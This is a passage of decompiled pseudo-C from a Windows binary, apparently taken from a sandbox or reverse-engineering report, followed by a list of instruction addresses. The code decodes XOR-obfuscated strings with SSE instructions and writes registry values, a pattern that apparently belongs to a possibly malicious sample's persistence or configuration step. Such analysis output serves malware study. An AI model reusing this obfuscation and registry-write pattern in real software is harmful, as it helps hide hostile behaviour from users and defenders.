												_v220 = 0x4e04248d;
												_v216 = 0xd5e686b8;
												_v212 = 0xdde36dfa;
												_v208 = 0x338084bd;
												asm("pxor xmm1, [ebp-0xd0]");
												asm("movaps [ebp-0x280], xmm1"); // executed
												RegSetValueExA(_v124,  &_v668, _t1107, _t1106,  &_v120, _t1105);
												_t1111 =  *0xee2f54; // 0x80000001
												if(_t1111 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
													E00E38E56(_t1111, 0xee2f54);
													_t1833 = _t1833 + 4;
													__eflags =  *0xee2f54 - 0xffffffff;
													if(__eflags == 0) {
														 *0xee2f48 = 0;
														 *0xee2f4c = 0;
														 *0xee2f50 = 0;
														E00E38CD4(__eflags, E00EBA040);
														E00E38E0C(0xee2f54);
														_t1833 = _t1833 + 8;
													}
												}
												_t1648 =  *0xee2f4c; // 0x0
												_t1758 =  *0xee2f48; // 0x0
												_t1470 = _t1648 - _t1758;
												if(_t1470 >> 3 >= 0xf) {
													 *0xee2f4c = _t1758;
												} else {
													_v322 = 1;
													_t1520 = (_t1470 ^ 0x000007e8) >> 3;
													_v928 = _t1520;
													_v52 = 1;
													_v48 = _t1520;
													_t1904 = _t1648 -  *0xee2f50; // 0x0
													if(_t1904 == 0) {
														_push( &_v52);
														E00E30010(_t1648);
													} else {
														 *_t1648 = 1;
														_t1648[4] = _v48;
														 *0xee2f4c =  &(( *0xee2f4c)[8]);
													}
												}
												_v24 =  *0xee2c78;
												_t1116 = E00EB6890(0xa59f36e, 0);
												_t1733 = _t1116;
												_t1117 = E00EB6890(0xa59f36e, 0);
												_t1118 = E00EB6890(0xa4fca06, 0);
												_t1834 = _t1833 + 0x18;
												_v700 = 0x9091e167;
												_v696 = 0x54e21790;
												_v692 = 0xc87523ed;
												_v688 = 0xaa61255e;
												_v684 = 0x3a6d4ae2;
												_v680 = 0xbb8ff4d7;
												_v676 = 0xdde36d9d;
												_v672 = 0x338084bd;
												asm("movaps xmm1, [ebp-0x2b0]");
												_v236 = 0xf1e28823;
												_v232 = 0x6877bf2;
												_v228 = 0xbc194288;
												_v224 = 0xe7044837;
												asm("pxor xmm1, [ebp-0xe0]");
												asm("movaps [ebp-0x2b0], xmm1");
												asm("movaps xmm1, [ebp-0x2a0]");
												_v220 = 0x4e04248d;
												_v216 = 0xd5e686b8;
												_v212 = 0xdde36dfa;
												_v208 = 0x338084bd;
												asm("pxor xmm1, [ebp-0xd0]");
												asm("movaps [ebp-0x2a0], xmm1"); // executed
												RegSetValueExA(_v124,  &_v700, _t1118, _t1117,  &_v120, _t1116);
												E00E2C370(_t1437,  &_v156, _t1648);
												E00E2C370(_t1437,  &_v308, _t1648);
												_v384 = 0x11;
												if( *((intOrPtr*)(E00E2C270(_t1437,  &_v156,  &_v384))) != 5) {
													L124:
													_v436 = _v152;
													 *((intOrPtr*)(E00E2C270(_t1437,  &_v156,  &_v436))) = 5;
													_v200 = _v304;
													 *((intOrPtr*)(E00E2C270(_t1437,  &_v308,  &_v200))) = 0xd;
													__eflags = _v152;
													if(_v152 != 0) {
														goto L126;
													}
													goto L125;
												} else {
													_v432 = 0xbe;
													if( *((intOrPtr*)(E00E2C270(_t1437,  &_v308,  &_v432))) != 0xd) {
														goto L124;
													}
													_t1774 = _v156;
													E00E2FFC0( &_v156, _t1648,  &_v156,  *((intOrPtr*)(_t1774 + 4)));
													 *((intOrPtr*)(_t1774 + 4)) = _t1774;
													 *_t1774 = _t1774;
													 *((intOrPtr*)(_t1774 + 8)) = _t1774;
													_v152 = 0;
													L125:
													_t1773 = _v308;
													E00E2FFC0( &_v308, _t1648,  &_v308,  *((intOrPtr*)(_t1773 + 4)));
													 *((intOrPtr*)(_t1773 + 4)) = _t1773;
													 *_t1773 = _t1773;
													 *((intOrPtr*)(_t1773 + 8)) = _t1773;
													_v304 = 0;
													L126:
													E00E2FFC0( &_v308, _t1648,  &_v308,  *((intOrPtr*)(_v308 + 4)));
													_push(0x18);
													E00E28D60(_t1437, _t1733, _v308);
													E00E2FFC0( &_v156, _t1648,  &_v156,  *((intOrPtr*)(_v156 + 4)));
													_push(0x18);
													E00E28D60(_t1437, _t1733, _v156);
													_t1836 = _t1834 + 0x10;
													_t1140 =  *0xee2f54; // 0x80000001
													if(_t1140 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
														E00E38E56(_t1140, 0xee2f54);
														_t1836 = _t1836 + 4;
														__eflags =  *0xee2f54 - 0xffffffff;
														if(__eflags == 0) {
															 *0xee2f48 = 0;
															 *0xee2f4c = 0;
															 *0xee2f50 = 0;
															E00E38CD4(__eflags, E00EBA040);
															E00E38E0C(0xee2f54);
															_t1836 = _t1836 + 8;
														}
													}
													_t1480 =  *0xee2f4c; // 0x0
													_t1649 =  *0xee2f48; // 0x0
													_t1481 = _t1480 - _t1649;
													if(_t1481 >> 3 >= 0xf) {
														 *0xee2f4c = _t1649;
													} else {
														_v323 = 1;
														_t1515 = (_t1481 ^ 0x000007e8) >> 3;
														_v388 = _t1515;
														_v900 = 1;
														_v896 = _t1515;
														E00E2C3F0( &_v900);
													}
													_v200 =  *0xee2c78;
													_v52 = 0x3fad5;
													_v48 = 0;
													_v188 = _v52 ^ 0x00000009;
													_v184 = _v48 ^ 0x00000000;
													_v52 = 9;
													_v48 = 0;
													_v92 = 0xd8c4;
													_v88 = 0;
													_v196 = 0x97a4;
													_v192 = 0;
													asm("adc esi, ecx");
													_v52 = _v52 + _v92 + 1;
													asm("adc esi, 0x0");
													_v92 = _v188 - _v196;
													asm("sbb esi, ecx");
													_v88 = _v184;
													_t1655 = _v52;
													_v52 = E00E80C40(_v92, _v88, _t1655, _v48);
													_v48 = _t1655;
													_t1152 = E00EB6890(0xa59f36e, 0);
													_t1153 = E00EB6890(0xa4fca06, 0);
													_v732 = 0x9091e167;
													_v728 = 0x4fe21790;
													_v724 = 0xec4f03c7;
													_v720 = 0x82702745;
													_v716 = 0x216d50ee;
													_v712 = 0xd5e686d6;
													_v708 = 0xdde36dfa;
													_v704 = 0x338084bd;
													asm("movaps xmm1, [ebp-0x2d0]");
													_v236 = 0xf1e28823;
													_v232 = 0x6877bf2;
													_v228 = 0xbc194288;
													_v224 = 0xe7044837;
													asm("pxor xmm1, [ebp-0xe0]");
													asm("movaps [ebp-0x2d0], xmm1");
													asm("movaps xmm1, [ebp-0x2c0]");
													_v220 = 0x4e04248d;
													_v216 = 0xd5e686b8;
													_v212 = 0xdde36dfa;
													_v208 = 0x338084bd;
													asm("pxor xmm1, [ebp-0xd0]");
													asm("movaps [ebp-0x2c0], xmm1");
													RegSetValueExA(_v124,  &_v732, _t1153, _t1152,  &_v120, _v52);
													_t1156 =  *0xee2c78; // 0x74b60770
													_v200 = _t1156;
													_v52 = 0x3fad5;
													_v48 = 0;
													_v188 = _v52 ^ 0x00000009;
													_v184 = _v48 ^ 0x00000000;
													_v52 = 9;
													_v48 = 0;
													_v92 = 0xd8c4;
													_v88 = 0;
													_v196 = 0x97a4;
													_v192 = 0;
													asm("adc esi, ecx");
													_v92 = _v52 + _v92 + 1;
													asm("adc esi, 0x0");
													_v88 = _v48;
													_v52 = _v188 - _v196;
													asm("sbb esi, ecx");
													_v48 = _v184;
													_t1661 = _v48;
													_v52 = E00E80C40(_v52, _t1661, _v92, _v88);
													_v48 = _t1661;
													_t1735 = _v52;
													_t1164 = E00EB6890(0xa59f36e, 0);
													_t1165 = E00EB6890(0xa4fca06, 0);
													_v764 = 0x9091e167;
													_v760 = 0x54e21790;
													_v756 = 0xce4e35e9;
													_v752 = 0xa9613c5e;
													_v748 = 0x286d50e2;
													_v744 = 0xa187e5d1;
													_v740 = 0xdd8d0293;
													_v736 = 0x338084bd;
													asm("movaps xmm1, [ebp-0x2f0]");
													_v236 = 0xf1e28823;
													_v232 = 0x6877bf2;
													_v228 = 0xbc194288;
													_v224 = 0xe7044837;
													asm("pxor xmm1, [ebp-0xe0]");
													asm("movaps [ebp-0x2f0], xmm1");
													asm("movaps xmm1, [ebp-0x2e0]");
													_v220 = 0x4e04248d;
													_v216 = 0xd5e686b8;
													_v212 = 0xdde36dfa;
													_v208 = 0x338084bd;
													asm("pxor xmm1, [ebp-0xd0]");
													asm("movaps [ebp-0x2e0], xmm1");
													RegSetValueExA(_v124,  &_v764, _t1165, _t1164,  &_v120, _v52);
													E00E2C370(_t1437,  &_v148, _t1661);
													E00E2C370(_t1437,  &_v316, _t1661);
													_v56 = 0x11;
													if( *((intOrPtr*)(E00E2C270(_t1437,  &_v148,  &_v56))) != 5) {
														L133:
														_v56 = _v144;
														 *((intOrPtr*)(E00E2C270(_t1437,  &_v148,  &_v56))) = 5;
														_v56 = _v312;
														 *((intOrPtr*)(E00E2C270(_t1437,  &_v316,  &_v56))) = 0xd;
														__eflags = _v144;
														if(_v144 != 0) {
															goto L135;
														}
														goto L134;
													} else {
														_v56 = 0xbe;
														if( *((intOrPtr*)(E00E2C270(_t1437,  &_v316,  &_v56))) != 0xd) {
															goto L133;
														}
														_t1772 = _v148;
														E00E2FFC0( &_v148, _t1661,  &_v148,  *((intOrPtr*)(_t1772 + 4)));
														 *((intOrPtr*)(_t1772 + 4)) = _t1772;
														 *_t1772 = _t1772;
														 *((intOrPtr*)(_t1772 + 8)) = _t1772;
														_v144 = 0;
														L134:
														_t1771 = _v316;
														E00E2FFC0( &_v316, _t1661,  &_v316,  *((intOrPtr*)(_t1771 + 4)));
														 *((intOrPtr*)(_t1771 + 4)) = _t1771;
														 *_t1771 = _t1771;
														 *((intOrPtr*)(_t1771 + 8)) = _t1771;
														_v312 = 0;
														L135:
														E00E2FFC0( &_v316, _t1661,  &_v316,  *((intOrPtr*)(_v316 + 4)));
														_push(0x18);
														E00E28D60(_t1437, _t1735, _v316);
														E00E2FFC0( &_v148, _t1661,  &_v148,  *((intOrPtr*)(_v148 + 4)));
														_push(0x18);
														E00E28D60(_t1437, _t1735, _v148);
														RegCloseKey(_v124);
														E00E2C370(_t1437,  &_v140, _t1661);
														E00E2C370(_t1437,  &_v180, _t1661);
														_v56 = 0x11;
														if( *((intOrPtr*)(E00E2C270(_t1437,  &_v140,  &_v56))) != 5) {
															L138:
															_v56 = _v136;
															 *((intOrPtr*)(E00E2C270(_t1437,  &_v140,  &_v56))) = 5;
															_v56 = _v176;
															 *((intOrPtr*)(E00E2C270(_t1437,  &_v180,  &_v56))) = 0xd;
															__eflags = _v136;
															if(_v136 != 0) {
																L140:
																E00E2FFC0( &_v180, _t1661,  &_v180,  *((intOrPtr*)(_v180 + 4)));
																_push(0x18);
																E00E28D60(_t1437, _t1735, _v180);
																E00E2FFC0( &_v140, _t1661,  &_v140,  *((intOrPtr*)(_v140 + 4)));
																_push(0x18);
																_t1204 = E00E28D60(_t1437, _t1735, _v140);
																L141:
																return _t1204;
															}
															L139:
															_t1769 = _v180;
															E00E2FFC0( &_v180, _t1661,  &_v180,  *((intOrPtr*)(_t1769 + 4)));
															 *((intOrPtr*)(_t1769 + 4)) = _t1769;
															 *_t1769 = _t1769;
															 *((intOrPtr*)(_t1769 + 8)) = _t1769;
															_v176 = 0;
															goto L140;
														}
														_v56 = 0xbe;
														if( *((intOrPtr*)(E00E2C270(_t1437,  &_v180,  &_v56))) != 0xd) {
															goto L138;
														}
														_t1770 = _v140;
														E00E2FFC0( &_v140, _t1661,  &_v140,  *((intOrPtr*)(_t1770 + 4)));
														 *((intOrPtr*)(_t1770 + 4)) = _t1770;
														 *_t1770 = _t1770;
														 *((intOrPtr*)(_t1770 + 8)) = _t1770;
														_v136 = 0;
														goto L139;
													}
												}
											}
										}
										_v352 = _t1805;
										_v904 =  &_v400;
										_v476 =  &_v108;
										_t1386 = E00E28D30(_t1437, _t1715, _t1742, 0x18);
										_t1716 =  *0xed185b; // 0x0
										_t1808 = _t1386;
										_v24 = _t1716;
										_v472 = _t1808;
										_t328 = _t1808 + 0x10; // 0x10
										 *_t1827 =  &_v400;
										E00E37640(_t328, _v24, _t328);
										E00E29300(_t1808,  &_v352);
										_t331 = _t1808 + 4; // 0x4
										E00E29300(_t331,  &_v352);
										_t332 = _t1808 + 8; // 0x8
										E00E29300(_t332,  &_v352);
										 *((short*)(_t1808 + 0xc)) = 0;
										_v492 = 0;
										_t1392 = E00E29740( &_v472,  &_v492);
										_t1606 = _v472;
										_t1809 = _t1392;
										__eflags = _t1606;
										if(_t1606 != 0) {
											_push(0x18);
											E00E28D60(_t1437, _t1742, _t1606);
											_t1827 = _t1827 + 8;
										}
										_t1450 = E00E294B0( &_v108, _v40, _t1742, _t1809);
										L50:
										 *((intOrPtr*)(_t1450 + 0x14)) = 5;
										_t1728 = 0;
										_t1394 = _v100;
										_t1450 = _t1394;
										_t1720 = _v96;
										_v396 = _t1720;
										_t1810 =  *((intOrPtr*)(_t1394 + 4));
										_v40 = _t1810;
										__eflags =  *((char*)(_t1810 + 0xd));
										if( *((char*)(_t1810 + 0xd)) != 0) {
											L57:
											__eflags =  *((char*)(_t1450 + 0xd));
											if( *((char*)(_t1450 + 0xd)) != 0) {
												L59:
												__eflags = _t1720 - 0xaaaaaaa;
												if(__eflags == 0) {
													goto L147;
												}
												_v344 = _t1394;
												_v912 =  &_v396;
												_v484 =  &_v100;
												_t1396 = E00E28D30(_t1437, _t1720, _t1728, 0x18);
												_t1721 =  *0xed185b; // 0x0
												_t1811 = _t1396;
												_v24 = _t1721;
												_v480 = _t1811;
												_t362 = _t1811 + 0x10; // 0x10
												 *_t1827 =  &_v396;
												E00E37640(_t362, _v24, _t362);
												E00E29300(_t1811,  &_v344);
												_t365 = _t1811 + 4; // 0x4
												E00E29300(_t365,  &_v344);
												_t366 = _t1811 + 8; // 0x8
												E00E29300(_t366,  &_v344);
												_t1635 =  &_v496;
												 *((short*)(_t1811 + 0xc)) = 0;
												_v496 = 0;
												_t1402 = E00E29740( &_v480,  &_v496);
												_t1614 = _v480;
												_t1812 = _t1402;
												__eflags = _t1614;
												if(_t1614 != 0) {
													_push(0x18);
													E00E28D60(_t1437, _t1728, _t1614);
													_t1827 = _t1827 + 8;
												}
												_t1450 = E00E294B0( &_v100, _v40, _t1728, _t1812);
												L63:
												 *((intOrPtr*)(_t1450 + 0x14)) = 0xd;
												__eflags = _v104;
												if(_v104 != 0) {
													L65:
													E00E2FFC0( &_v100, _t1635,  &_v100,  *((intOrPtr*)(_v100 + 4)));
													_push(0x18);
													E00E28D60(_t1437, _t1728, _v100);
													E00E2FFC0( &_v108, _t1635,  &_v108,  *((intOrPtr*)(_v108 + 4)));
													_push(0x18);
													E00E28D60(_t1437, _t1728, _v108);
													_t1825 = _t1827 + 0x10;
													goto L66;
												}
												L64:
												_t1813 = _v100;
												E00E2FFC0( &_v100, _t1635,  &_v100,  *((intOrPtr*)(_t1813 + 4)));
												 *((intOrPtr*)(_t1813 + 4)) = _t1813;
												 *_t1813 = _t1813;
												 *((intOrPtr*)(_t1813 + 8)) = _t1813;
												_v96 = 0;
												goto L65;
											}
											__eflags = _t1720 -  *((intOrPtr*)(_t1450 + 0x10));
											if(_t1720 >=  *((intOrPtr*)(_t1450 + 0x10))) {
												goto L63;
											}
											goto L59;
										}
										_t1415 = _t1810;
										do {
											_v40 = _t1415;
											__eflags =  *((intOrPtr*)(_t1415 + 0x10)) - _t1720;
											if( *((intOrPtr*)(_t1415 + 0x10)) >= _t1720) {
												_t1450 = _t1415;
												_t1728 = 1;
												_t1415 =  *_t1415;
											} else {
												_t1415 =  *((intOrPtr*)(_t1415 + 8));
												_t1728 = 0;
											}
											__eflags =  *((char*)(_t1415 + 0xd));
										} while ( *((char*)(_t1415 + 0xd)) == 0);
										_t1394 = _v100;
										goto L57;
									}
									__eflags = _t1715 -  *((intOrPtr*)(_t1450 + 0x10));
									if(_t1715 >=  *((intOrPtr*)(_t1450 + 0x10))) {
										goto L50;
									}
									goto L46;
								}
								do {
									_v40 = _t1383;
									__eflags =  *((intOrPtr*)(_t1383 + 0x10)) - _t1715;
									if( *((intOrPtr*)(_t1383 + 0x10)) >= _t1715) {
										_t1450 = _t1383;
										_t1742 = 1;
										_t1383 =  *_t1383;
									} else {
										_t1383 =  *((intOrPtr*)(_t1383 + 8));
										_t1742 = 0;
									}
									__eflags =  *((char*)(_t1383 + 0xd));
								} while ( *((char*)(_t1383 + 0xd)) == 0);
								_t1805 = _v80;
								goto L44;
							}
							_v376 = 0xbe;
							_t1728 = 0;
							_t1417 =  *((intOrPtr*)(_t1714 + 4));
							_t1450 = _t1714;
							_v40 = _t1417;
							if( *((char*)(_t1417 + 0xd)) != 0) {
								L29:
								if( *((char*)(_t1450 + 0xd)) != 0 ||  *((intOrPtr*)(_t1450 + 0x10)) > 0xbe) {
									if(_v96 == 0xaaaaaaa) {
										L145:
										E00E21C50(_t1450, __eflags);
										goto L146;
									}
									_v364 = _t1714;
									_v936 =  &_v376;
									_v468 =  &_v100;
									_t1420 = E00E28D30(_t1437, _t1714, _t1728, 0x18);
									_t1724 =  *0xed185b; // 0x0
									_t1814 = _t1420;
									_v24 = _t1724;
									_v464 = _t1814;
									_t288 = _t1814 + 0x10; // 0x10
									 *_t1827 =  &_v376;
									E00E37640(_t288, _v24, _t288);
									E00E29300(_t1814,  &_v364);
									_t291 = _t1814 + 4; // 0x4
									E00E29300(_t291,  &_v364);
									_t292 = _t1814 + 8; // 0x8
									E00E29300(_t292,  &_v364);
									_t1635 =  &_v488;
									 *((short*)(_t1814 + 0xc)) = 0;
									_v488 = 0;
									_t1426 = E00E29740( &_v464,  &_v488);
									_t1624 = _v464;
									_t1815 = _t1426;
									if(_v464 != 0) {
										_push(0x18);
										E00E28D60(_t1437, _t1728, _t1624);
										_t1827 = _t1827 + 8;
									}
									_t1427 = E00E294B0( &_v100, _v40, _t1728, _t1815);
									_t1805 = _v108;
									_t1450 = _t1427;
									_v80 = _t1805;
									goto L35;
								} else {
									L35:
									if( *((intOrPtr*)(_t1450 + 0x14)) != 0xd) {
										goto L37;
									}
									E00E2FFC0( &_v108, _t1635,  &_v108,  *((intOrPtr*)(_t1805 + 4)));
									 *((intOrPtr*)(_t1805 + 4)) = _t1805;
									 *_t1805 = _t1805;
									 *((intOrPtr*)(_t1805 + 8)) = _t1805;
									_v104 = 0;
									goto L64;
								}
							}
							do {
								_v40 = _t1417;
								if( *((intOrPtr*)(_t1417 + 0x10)) >= 0xbe) {
									_t1450 = _t1417;
									_t1728 = 1;
									_t1417 =  *_t1417;
								} else {
									_t1417 =  *((intOrPtr*)(_t1417 + 8));
									_t1728 = 0;
								}
							} while ( *((char*)(_t1417 + 0xd)) == 0);
							_t1805 = _v80;
							goto L29;
						}
					} else {
						do {
							_v40 = _t1368;
							if( *((intOrPtr*)(_t1368 + 0x10)) >= 0x11) {
								_t1450 = _t1368;
								_t1741 = 1;
								_t1368 =  *_t1368;
							} else {
								_t1368 =  *((intOrPtr*)(_t1368 + 8));
								_t1741 = 0;
							}
						} while ( *((char*)(_t1368 + 0xd)) == 0);
						goto L14;
					}
				}
			}

0x00eaf5c1
0x00eaf5d0
0x00eaf5ea
0x00eaf5ed
0x00eaf5fc
0x00eaf5ff
0x00eaf604
0x00eaf60e
0x00eaf610
0x00eaf61a
0x00eaf61d
0x00eaf627
0x00eaf631
0x00eaf63b
0x00eaf645
0x00eaf64f
0x00eaf659
0x00eaf663
0x00eaf66d
0x00eaf677
0x00eaf681
0x00eaf688
0x00eaf692
0x00eaf69c
0x00eaf6a6
0x00eaf6b0
0x00eaf6b8
0x00eaf6bf
0x00eaf6c6
0x00eaf6d0
0x00eaf6da
0x00eaf6e4
0x00eaf6ee
0x00eaf6f6
0x00eaf6fd
0x00eaf704
0x00eaf711
0x00eaf71e
0x00eaf728
0x00eaf732
0x00eaf73c
0x00eaf746
0x00eaf74e
0x00eaf755
0x00eaf758
0x00eaf75b
0x00eaf762
0x00eaf769
0x00eaf770
0x00eaf777
0x00eaf77e
0x00eaf793
0x00eaf798
0x00eaf79b
0x00eaf79e
0x00eaf7af
0x00eaf7b2
0x00eaf7ba
0x00eaf7cc
0x00eaf7df
0x00eaf7e9
0x00eaf7ef
0x00eaf7f2
0x00eaf7f5
0x00eb01e2
0x00eb01e4
0x00eb01f0
0x00eb01f8
0x00eb01fd
0x00eb0202
0x00eb0205
0x00eb020a
0x00eb020d
0x00eb0212
0x00eb021a
0x00eb021d
0x00eb0229
0x00eb0231
0x00eb0234
0x00eb0239
0x00eb023f
0x00eb0244
0x00eb0247
0x00eb024c
0x00eb024c
0x00eb024f
0x00eb0254
0x00eb025a
0x00eb025c
0x00eb025f
0x00eb0262
0x00eb0264
0x00eb026e
0x00eb0271
0x00eb0278
0x00eb029f
0x00eb02a3
0x00eb02b3
0x00eb02ba
0x00000000
0x00000000
0x00eb02c6
0x00eb02cc
0x00eb02d7
0x00eb02dd
0x00eb02e2
0x00eb02e8
0x00eb02ea
0x00eb02f3
0x00eb02f9
0x00eb0302
0x00eb0304
0x00eb0311
0x00eb0316
0x00eb0319
0x00eb031e
0x00eb0321
0x00eb032c
0x00eb0338
0x00eb0342
0x00eb0347
0x00eb034d
0x00eb034f
0x00eb0351
0x00eb0353
0x00eb0356
0x00eb035b
0x00eb035b
0x00eb0366
0x00eb036b
0x00eb036e
0x00eb0370
0x00eb0373
0x00000000
0x00eb02ab
0x00eb02ab
0x00eb0376
0x00eb037a
0x00eb04ba
0x00eb04c0
0x00eb04d5
0x00eb04de
0x00eb04f0
0x00eb04f6
0x00eb04fa
0x00eb051c
0x00eb0528
0x00eb052d
0x00eb0532
0x00eb0546
0x00eb054b
0x00eb0550
0x00eb0555
0x00eb055e
0x00eb0569
0x00eb0571
0x00eb0587
0x00eb05d5
0x00eb05e1
0x00eb05f9
0x00eb0605
0x00eb0617
0x00eb061d
0x00eb0624
0x00eb064f
0x00eb0661
0x00eb0666
0x00eb066e
0x00eb0688
0x00eb068d
0x00eb0695
0x00eb06a2
0x00eb06a5
0x00eb06b2
0x00eb06bc
0x00eb06c2
0x00eb06c5
0x00eb06cc
0x00eb06d3
0x00eb06da
0x00eb06e1
0x00eb06e8
0x00eb06fd
0x00eb0702
0x00eb0705
0x00eb0708
0x00eb0719
0x00eb071c
0x00eb071e
0x00eb0724
0x00eb0736
0x00eb0739
0x00eb073f
0x00eb074c
0x00eb0751
0x00eb0760
0x00eb0770
0x00eb0773
0x00eb0776
0x00eb077d
0x00eb0784
0x00eb078b
0x00eb0792
0x00eb0799
0x00eb07ae
0x00eb07b3
0x00eb07b6
0x00eb07b9
0x00eb07ca
0x00eb07cd
0x00eb07cf
0x00eb07d5
0x00eb07e7
0x00eb07ea
0x00eb07f3
0x00eb07fd
0x00eb0807
0x00eb0811
0x00eb081b
0x00eb0825
0x00eb082f
0x00eb0839
0x00eb0843
0x00eb084d
0x00eb0857
0x00eb0861
0x00eb086b
0x00eb0875
0x00eb087f
0x00eb0889
0x00eb0893
0x00eb089d
0x00eb08a7
0x00eb08b1
0x00eb08bb
0x00eb08c2
0x00eb08cc
0x00eb08d6
0x00eb08e0
0x00eb08ea
0x00eb08f2
0x00eb08f9
0x00eb0900
0x00eb090a
0x00eb0914
0x00eb091e
0x00eb0928
0x00eb0932
0x00eb093c
0x00eb0946
0x00eb0950
0x00eb095a
0x00eb0964
0x00eb096e
0x00eb0978
0x00eb0982
0x00eb098c
0x00eb0996
0x00eb09a0
0x00eb09ae
0x00eb09bb
0x00eb09c2
0x00eb09cf
0x00eb09d6
0x00eb09dd
0x00eb09e8
0x00eb09ef
0x00eb09f6
0x00eb0a05
0x00eb0a0c
0x00eb0a0f
0x00eb0a19
0x00eb0a1b
0x00eb0a20
0x00eb0a25
0x00000000
0x00eb0a33
0x00eb0a3b
0x00eb0a46
0x00000000
0x00000000
0x00000000
0x00eb0a46
0x00eb0a25
0x00eb0626
0x00eb0626
0x00eb0638
0x00eb063d
0x00eb0640
0x00eb0642
0x00eb0645
0x00000000
0x00eb0645
0x00eb058f
0x00eb05a8
0x00000000
0x00000000
0x00eb05aa
0x00eb05bc
0x00eb05c1
0x00eb05c4
0x00eb05c6
0x00eb05c9
0x00000000
0x00eb05c9
0x00eb04fc
0x00eb04fc
0x00eb0508
0x00eb050d
0x00eb0510
0x00eb0512
0x00eb0515
0x00000000
0x00eb0515
0x00eb0380
0x00eb038a
0x00eb038c
0x00eb038f
0x00eb0391
0x00eb0398
0x00eb03c5
0x00eb03c9
0x00eb03df
0x00000000
0x00000000
0x00eb03eb
0x00eb03f1
0x00eb03fc
0x00eb0402
0x00eb0407
0x00eb040d
0x00eb040f
0x00eb0418
0x00eb041e
0x00eb0427
0x00eb0429
0x00eb0436
0x00eb043b
0x00eb043e
0x00eb0443
0x00eb0446
0x00eb0451
0x00eb045d
0x00eb0467
0x00eb046c
0x00eb0472
0x00eb0476
0x00eb0478
0x00eb047b
0x00eb0480
0x00eb0480
0x00eb048b
0x00eb0490
0x00eb0493
0x00000000
0x00eb0495
0x00eb0495
0x00eb0499
0x00000000
0x00000000
0x00eb04a4
0x00eb04a9
0x00eb04ac
0x00eb04ae
0x00eb04b1
0x00000000
0x00eb04b1
0x00eb03c9
0x00eb03a0
0x00eb03a7
0x00eb03aa
0x00eb03b3
0x00eb03b5
0x00eb03ba
0x00eb03ac
0x00eb03ac
0x00eb03af
0x00eb03af
0x00eb03bc
0x00eb03c2
0x00000000
0x00eb03c2
0x00eb02a3
0x00eb0280
0x00eb0284
0x00eb0287
0x00eb0290
0x00eb0292
0x00eb0297
0x00eb0289
0x00eb0289
0x00eb028c
0x00eb028c
0x00eb0299
0x00000000
0x00eaf803
0x00eaf80f
0x00eaf812
0x00eaf817
0x00eaf829
0x00eaf833
0x00eaf839
0x00eaf83c
0x00eaf843
0x00eaf84a
0x00eaf851
0x00eaf858
0x00eaf85f
0x00eaf874
0x00eaf879
0x00eaf87c
0x00eaf87f
0x00eaf890
0x00eaf893
0x00eaf895
0x00eaf89b
0x00eaf8ad
0x00eaf8b0
0x00eaf8c0
0x00eaf8c5
0x00eaf8d2
0x00eaf8dc
0x00eaf8df
0x00eaf8e9
0x00eaf8f3
0x00eaf8fd
0x00eaf907
0x00eaf911
0x00eaf91b
0x00eaf922
0x00eaf92c
0x00eaf936
0x00eaf940
0x00eaf94a
0x00eaf952
0x00eaf959
0x00eaf960
0x00eaf96a
0x00eaf974
0x00eaf97e
0x00eaf988
0x00eaf991
0x00eaf9a8
0x00eaf9b3
0x00eaf9be
0x00eb18e0
0x00eb18e5
0x00eb18e8
0x00eb18ef
0x00eb18fa
0x00eb1904
0x00eb190e
0x00eb1918
0x00eb1925
0x00eb192a
0x00eb192a
0x00eb18ef
0x00eaf9c4
0x00eaf9cc
0x00eaf9d2
0x00eaf9dc
0x00eafa2d
0x00eaf9de
0x00eaf9e4
0x00eaf9eb
0x00eaf9ee
0x00eaf9f4
0x00eaf9fb
0x00eafa01
0x00eafa07
0x00eafa24
0x00eafa26
0x00eafa09
0x00eafa09
0x00eafa12
0x00eafa15
0x00eafa15
0x00eafa07
0x00eafa3f
0x00eafa45
0x00eafa4a
0x00eafa5a
0x00eafa64
0x00eafa6a
0x00eafa6d
0x00eafa74
0x00eafa7b
0x00eafa82
0x00eafa89
0x00eafa90
0x00eafa9d
0x00eafaa8
0x00eafaad
0x00eafab0
0x00eafab3
0x00eafac4
0x00eafac7
0x00eafac9
0x00eafacf
0x00eafae1
0x00eafae4
0x00eafaed
0x00eafafa
0x00eafb04
0x00eafb0a
0x00eafb0d
0x00eafb14
0x00eafb1b
0x00eafb22
0x00eafb29
0x00eafb30
0x00eafb45
0x00eafb4a
0x00eafb4d
0x00eafb50
0x00eafb61
0x00eafb64
0x00eafb66
0x00eafb6c
0x00eafb81
0x00eafb84
0x00eafb8d
0x00eafb9b
0x00eafbab
0x00eafbb5
0x00eafbbf
0x00eafbc9
0x00eafbd3
0x00eafbdd
0x00eafbe7
0x00eafbef
0x00eafbf9
0x00eafc03
0x00eafc0d
0x00eafc17
0x00eafc20
0x00eafc27
0x00eafc35
0x00eafc3f
0x00eafc49
0x00eafc53
0x00eafc5d
0x00eafc65
0x00eafc6c
0x00eafc78
0x00eafc80
0x00eafc8c
0x00eafc97
0x00eafc9f
0x00eafca4
0x00eafca7
0x00eafcac
0x00eafcaf
0x00eafcb4
0x00eafcbc
0x00eafcbf
0x00eafccb
0x00eafccd
0x00eafcd3
0x00eafcd6
0x00eafcdb
0x00eafce1
0x00eafce6
0x00eafce9
0x00eafcee
0x00eafcf1
0x00eafcf6
0x00eafcfc
0x00eafcff
0x00eafd09
0x00eafd0c
0x00eafd0e
0x00eafd11
0x00eafd13
0x00eafd16
0x00eafd1d
0x00eafd3f
0x00eafd43
0x00eafd53
0x00eafd5a
0x00eb1932
0x00000000
0x00eb1932
0x00eafd66
0x00eafd6c
0x00eafd77
0x00eafd7d
0x00eafd82
0x00eafd88
0x00eafd8a
0x00eafd93
0x00eafd99
0x00eafda2
0x00eafda4
0x00eafdb1
0x00eafdb6
0x00eafdb9
0x00eafdbe
0x00eafdc1
0x00eafdcc
0x00eafdd8
0x00eafde2
0x00eafde7
0x00eafded
0x00eafdef
0x00eafdf1
0x00eafdf3
0x00eafdf6
0x00eafdfb
0x00eafdfb
0x00eafe06
0x00eafe0b
0x00eafe0e
0x00eafe10
0x00eafe13
0x00000000
0x00eafd4b
0x00eafd4b
0x00eafe16
0x00eafe1a
0x00eaff60
0x00eaff60
0x00eaff63
0x00eaff65
0x00eaff6b
0x00eaff6d
0x00eaff70
0x00eaff73
0x00eaff77
0x00eaffa1
0x00eaffa1
0x00eaffa5
0x00eaffb0
0x00eaffb0
0x00eaffb6
0x00eb193c
0x00eb193c
0x00eb1941
0x00eb1941
0x00eb1946
0x00eb1946
0x00eb194b
0x00eb194b
